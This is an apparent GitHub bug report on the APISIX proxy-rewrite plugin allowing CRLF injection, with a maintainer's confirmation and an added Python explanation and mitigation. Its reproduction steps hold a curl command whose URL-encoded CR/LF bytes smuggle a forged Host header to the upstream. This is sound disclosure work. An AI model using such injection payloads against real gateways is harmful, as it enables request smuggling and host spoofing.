bug: The proxy-rewrite plugin may cause CRLF injection vulnerabilities #8877

Closed
zuiyangqingzhou opened this issue Feb 17, 2023 · 1 comment · Fixed by #8888
@zuiyangqingzhou
Contributor

Current Behavior

  1. Openresty as the upstream, the configuration file is as follows:

     pid logs/nginx.pid;
     events {
         worker_connections 1024;
     }

     http {
         server {
             listen 8866;
             location / {
                 content_by_lua '
                     ngx.say(ngx.var.host)
                 ';
             }
         }
     }

  2. Do not enable the proxy-rewrite plugin

     curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

     ## output:

     HTTP/1.1 200 OK
     Content-Type: text/plain; charset=utf-8
     Transfer-Encoding: chunked
     Connection: keep-alive
     Date: Fri, 17 Feb 2023 04:07:49 GMT
     Server: Openresty

     test-limit.com

  3. Enable the proxy-rewrite plugin

     ## the proxy-rewrite plugin configuration file is as follows
     proxy-rewrite: {
           "host": "test.xxxx.com"
     },

     curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

     ## output
     HTTP/1.1 200 OK
     Content-Type: text/plain; charset=utf-8
     Transfer-Encoding: chunked
     Connection: keep-alive
     Date: Fri, 17 Feb 2023 04:24:42 GMT
     Server: Openresty

     google.com

Expected Behavior

The host obtained by upstream should not be rewritten as google.com, which can lead to malicious attacks

Error Logs

none

Steps to Reproduce

  1. Openresty as the upstream, the configuration file is as follows:

     pid logs/nginx.pid;
     events {
         worker_connections 1024;
     }

     http {
         server {
             listen 8866;
             location / {
                 content_by_lua '
                     ngx.say(ngx.var.host)
                 ';
             }
         }
     }

  2. Do not enable the proxy-rewrite plugin

     curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

     ## output:

     HTTP/1.1 200 OK
     Content-Type: text/plain; charset=utf-8
     Transfer-Encoding: chunked
     Connection: keep-alive
     Date: Fri, 17 Feb 2023 04:07:49 GMT
     Server: Openresty

     test-limit.com

  3. Enable the proxy-rewrite plugin

     ## the proxy-rewrite plugin configuration file is as follows
     proxy-rewrite: {
           "host": "test.xxxx.com"
     },

     curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

     ## output
     HTTP/1.1 200 OK
     Content-Type: text/plain; charset=utf-8
     Transfer-Encoding: chunked
     Connection: keep-alive
     Date: Fri, 17 Feb 2023 04:24:42 GMT
     Server: Openresty

     google.com

Environment

  • APISIX version (run apisix version): 2.10.5
  • Operating system (run uname -a): amzn2.x86_64
  • OpenResty / Nginx version (run openresty -V or nginx -V): nginx version: openresty/1.19.9.1
  • etcd version, if relevant (run curl http://127.0.0.1:9090/v1/server_info): 3.5
  • APISIX Dashboard version, if relevant:
  • Plugin runner version, for issues related to plugin runners:
  • LuaRocks version, for installation issues (run luarocks --version):
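
The Host change reported above, reduced to its byte-level mechanics (an added example, not code from APISIX or from the reporter). It assumes the gateway forwards the percent-decoded path once the plugin is enabled; `build_request_head`, `first_request_host`, `has_control_chars` and `safe_upstream_uri` are hypothetical helper names, and re-encoding is one possible mitigation, not necessarily the change merged in #8888.

```python
from urllib.parse import quote, unquote

# Path copied from the curl command in the report (still percent-encoded).
REPORTED_PATH = "/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a"


def build_request_head(uri: str, host: str) -> bytes:
    """Serialise a request head by plain concatenation (assumed proxy behaviour)."""
    return f"GET {uri} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode("latin-1")


def first_request_host(head: bytes) -> str:
    """Return the Host of the first request in the stream, as the upstream sees it."""
    first = head.split(b"\r\n\r\n", 1)[0]
    for line in first.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"host":
            return value.strip().decode("latin-1")
    return ""


def has_control_chars(uri: str) -> bool:
    """True if the URI holds CR, LF or any other ASCII control character."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in uri)


def safe_upstream_uri(decoded_uri: str) -> str:
    """Percent-encode everything except unreserved characters and '/'."""
    return quote(decoded_uri, safe="/")


def demo(rewritten_host: str = "test.xxxx.com"):
    """Host seen by the upstream without and with re-encoding of the path."""
    decoded = unquote(REPORTED_PATH)
    unsafe = first_request_host(build_request_head(decoded, rewritten_host))
    safe = first_request_host(
        build_request_head(safe_upstream_uri(decoded), rewritten_host)
    )
    return unsafe, safe


if __name__ == "__main__":
    print("control chars after decoding:", has_control_chars(unquote(REPORTED_PATH)))
    print("upstream Host (decoded path, re-encoded path):", demo())
```

A gateway-side check can either reject a decoded URI for which `has_control_chars` is true or forward only the re-encoded form.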
@spacewander spacewander added the bug Something isn't working label Feb 20, 2023
@spacewander
Member

Thanks for your report! I can reproduce it with the latest version.
